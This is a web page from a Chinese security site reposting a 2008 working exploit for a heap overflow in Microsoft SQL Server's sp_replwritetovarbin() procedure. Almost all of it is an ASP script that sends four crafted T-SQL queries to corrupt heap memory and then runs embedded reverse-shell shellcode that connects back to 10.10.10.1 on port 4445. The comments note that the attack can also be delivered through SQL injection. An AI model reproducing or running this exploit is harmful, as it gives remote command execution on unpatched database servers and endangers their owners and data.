首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit (0day) 来源：www.vfcocus.net 作者：k`sOSe 发布时间：2008-12-18   <html> <% // k`sOSe 12/17/2008 // Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow // Tested on Win2k SP4 with MSSQL 2000(on one box only!). // Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445), // the change allows multiple shots :) // // You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff. // Take a look at the comments in T-SQL On Error Resume Next // change this UserName = "r00t" Password = "t00r" // ########################################### FIRST QUERY SQL = "DECLARE @buf NVARCHAR(4000), "&_ "@val NVARCHAR(4), "&_ "@counter INT "&_ "SET @buf = ' "&_ "declare @retcode int, "&_ "@end_offset int, "&_ "@vb_buffer varbinary, "&_ "@vb_bufferlen int "&_  "exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ "SET @val = CHAR(0x41) "&_ "SET @counter = 0 "&_ "WHILE @counter < 3020 "&_ "BEGIN "&_ "  SET @counter = @counter + 1 "&_ "  IF @counter = 2900 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x43) "&_ "  END "&_ "  ELSE IF @counter = 299 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x42) "&_ "  END "&_ "  ELSE IF @counter = 300 "&_ "  BEGIN "&_ "     /* First byte overwritten here. This is a random writable address */ "&_ "     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ "     CONTINUE "&_ "  END "&_ "  SET @buf = @buf + @val "&_ "END "&_ "SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_ "EXEC master..sp_executesql @buf" // ########################################### SECOND QUERY SQL2 = "DECLARE @buf NVARCHAR(4000), "&_ "@val NVARCHAR(4), "&_ "@counter INT "&_ "SET @buf = ' "&_ "declare @retcode int, "&_ "@end_offset int, "&_ "@vb_buffer varbinary, "&_ "@vb_bufferlen int "&_  "exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ "SET @val = CHAR(0x41) "&_ "SET @counter = 0 "&_ "WHILE @counter < 3097 "&_ "BEGIN "&_ "  SET @counter = @counter + 1 "&_ "  IF @counter = 2900 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x43) "&_ "  END "&_ "  ELSE IF @counter = 299 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x42) "&_ "  END "&_ "  ELSE IF @counter = 300 "&_ "  BEGIN "&_ "     /* Second byte overwritten here */ "&_ "     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ "     CONTINUE "&_ "  END "&_ "  SET @buf = @buf + @val "&_ "END "&_ "SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_ "EXEC master..sp_executesql @buf" // ########################################### THIRD QUERY SQL3 = "DECLARE @buf NVARCHAR(4000), "&_ "@val NVARCHAR(4), "&_ "@counter INT "&_ "SET @buf = ' "&_ "declare @retcode int, "&_ "@end_offset int, "&_ "@vb_buffer varbinary, "&_ "@vb_bufferlen int "&_  "exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ "SET @val = CHAR(0x41) "&_ "SET @counter = 0 "&_ "WHILE @counter < 3021 "&_ "BEGIN "&_ "  SET @counter = @counter + 1 "&_ "  IF @counter = 2900 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x43) "&_ "  END "&_ "  ELSE IF @counter = 299 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x42) "&_ "  END "&_ "  ELSE IF @counter = 300 "&_ "  BEGIN "&_ "     /* Third byte overwritten here */ "&_ "     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ "     CONTINUE "&_ "  END "&_ "  SET @buf = @buf + @val "&_ "END "&_ "SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_ "EXEC master..sp_executesql @buf" // ########################################### FOURTH QUERY SQL4 = "DECLARE @buf NVARCHAR(4000), "&_ "@val NVARCHAR(4), "&_ "@counter INT "&_ "SET @buf = ' "&_ "declare @retcode int, "&_ "@end_offset int, "&_ "@vb_buffer varbinary, "&_ "@vb_bufferlen int "&_  "exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_ "SET @val = CHAR(0x41) "&_ "SET @counter = 0 "&_ "WHILE @counter < 2708 "&_ "BEGIN "&_ "  SET @counter = @counter + 1 "&_ "  IF @counter = 2900 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x43) "&_ "  END "&_ "  IF @counter = 108 "&_ "  BEGIN "&_ "     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */ "&_ "    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_ "     /* realign code */ "&_ "    SET @buf = @buf + CHAR(0xe1) "&_ "     /* realign the stack */ "&_ "    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_ "     /* jump ahead */ "&_ "    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_ "    SET @counter = @counter + 12 "&_ "    CONTINUE "&_ "  END "&_ "  ELSE IF @counter = 299 "&_ "  BEGIN "&_ "    SET @val =  CHAR(0x42) "&_ "  END "&_ "  ELSE IF @counter = 300 "&_ "  BEGIN "&_ "     /* Fourth byte overwritten here */ "&_ "     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_ "     /* reverse shell on 10.10.10.1:4445 */ "&_ "     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6) "&_ "     CONTINUE "&_ "  END "&_ "  SET @buf = @buf + @val "&_ "END "&_ "SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_ "EXEC master..sp_executesql @buf" Set oConnection = Server.CreateObject("ADODB.Connection") oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password Set rs = Server.CreateObject("ADODB.Recordset") phase = Request.Querystring("p") if phase then if phase = 1 then rs.open SQL3, oConnection rs.close oConnection.Close Set oConnection = Nothing Response.Redirect("sql-exploit.asp?p=2") elseif phase = 2 then rs.open SQL4, oConnection rs.close oConnection.Close Set oConnection = Nothing Response.Redirect("sql-exploit.asp?p=3") end if Else rs.open SQL, oConnection rs.close oConnection.Close Set oConnection = Nothing Set oConnection = Server.CreateObject("ADODB.Connection") oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password Set rs = Server.CreateObject("ADODB.Recordset") rs.open SQL2, oConnection rs.close oConnection.Close Set oConnection = Nothing Response.Redirect("sql-exploit.asp?p=1") end if %> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Realtek Sound Manager (rtlrack ·PHP python extension safe_mode ·Aiyoota! CMS - Blind SQL Injec ·Phoenician Casino FlashAX Acti ·FLDS 1.2a report.php (linkida) ·Lizardware CMS <= 0.6.0 Blind ·Microsoft Outlook Express DoS ·2532Gigs 1.2.2 Stable Remote C ·MS Internet Explorer XML Parsi ·Mediatheka <= 4.2 Remote Blind ·Avahi < 0.6.24 (mDNS Daemon) R ·eZ Publish < 3.9.5/3.10.1/4.0.   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved